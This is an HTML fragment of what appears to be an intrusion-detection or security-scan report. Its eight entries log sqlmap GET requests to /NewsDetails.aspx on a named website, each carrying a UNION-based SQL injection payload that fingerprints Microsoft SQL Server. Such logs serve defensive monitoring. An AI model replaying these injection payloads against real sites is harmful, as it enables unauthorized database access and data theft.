                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1793-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1793-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-7912%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28HOST_NAME%28%29%3DHOST_NAME%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20toUC&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1714-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1714-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1714-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=255%20UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%2875%29%2BCHAR%2880%29%2BCHAR%2897%29%2BCHAR%2875%29%2BCHAR%28122%29%2BCHAR%28111%29%2BCHAR%28117%29%2BCHAR%2897%29%2BCHAR%28105%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--%20nMyF&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1772-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1772-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1772-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-6599%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28SQUARE%284613%29%3DSQUARE%284613%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20jCUa&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1822-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1822-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1822-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-9203%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28SYSDATETIME%28%29%3DSYSDATETIME%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20xOFr&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1808-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1808-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1808-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-1924%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28XACT_STATE%28%29%3DXACT_STATE%28%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20IQIm&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1839-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1839-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1839-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-6421%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CONCAT%28NULL%2CNULL%29%3DCONCAT%28NULL%2CNULL%29%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20EsKi&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1864-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1864-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1864-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-2414%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28ISJSON%28NULL%29%20IS%20NULL%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20FvDM&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    
        <span xmlns="" class="classh1_grey"><h2><span class="classsection_sub">
            <table width="100%">
                <tr width="100%" onclick="toggle('btag-外部引入/1849-Other&lt;br&gt; ')" onmouseover="this.style.cursor='pointer'" title="Collapse/Expand">
                    <td width="5%" height="50%">
                        <table style="table-layout: fixed;" width="30px" height="15px">
                            <tr width="100%"><td width="100%" class="classcell4"></td></tr>
                        </table>
                    </td>
                    <td align="left" width="85%">
                        
                        1849-Other<br>
                        
                    </td>
                    <td align="right" width="10%">[-/+]</td>
                </tr>
            </table></span></h2></span><div xmlns="" id="btag-外部引入/1849-Other&lt;br&gt; " style="display: block;">


        <h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->Description</h2>
        <span class="classtext" style="width:100%;color: #263645; font-weight: normal;">
            
                <div class="ui vertical segment"><p width="50%" style="word-wrap:break-word;word-break:break-all"><span style="color:red;font-weight:bold;">GET</span>&nbsp;/NewsDetails.aspx?ID=-5986%20UNION%20ALL%20SELECT%20NULL%2CCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28113%29%2B%28CASE%20WHEN%20%28CHARINDEX%28CHAR%2849%29%2BCHAR%2850%29%2BCHAR%2846%29%2BCHAR%2848%29%2BCHAR%2846%29%2BCHAR%2850%29%2BCHAR%2848%29%2BCHAR%2848%29%2BCHAR%2848%29%2C%40%40version%29%3E0%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--%20NZrk&nbsp;HTTP/1.1<br/>Accept-Encoding:&nbsp;gzip,deflate<br/>Host:&nbsp;www.njchh.com<br/>Accept:&nbsp;*/*<br/>User-Agent:&nbsp;sqlmap/1.0.10.54#dev&nbsp;(http://sqlmap.org)<br/>Connection:&nbsp;close<br/>Cache-Control:&nbsp;no-cache<br/><br/></p></div>
            
        <br></span><h2 class="classh1 " style="vertical-align: middle;"><!--[if mso]><img src="cid:#" width="1" height="25" border="0" style="display: block; float: left;">  
                    <![endif]]]-->详情报告下载地址</h2>
        <table width="100%"><tr><td width="100%" valign="top" class="classcell"> <a href="" target="_blank"></a>

        </td></tr></table>






        </div>


    

    </div>
    </td></tr>
</table>
</body></html>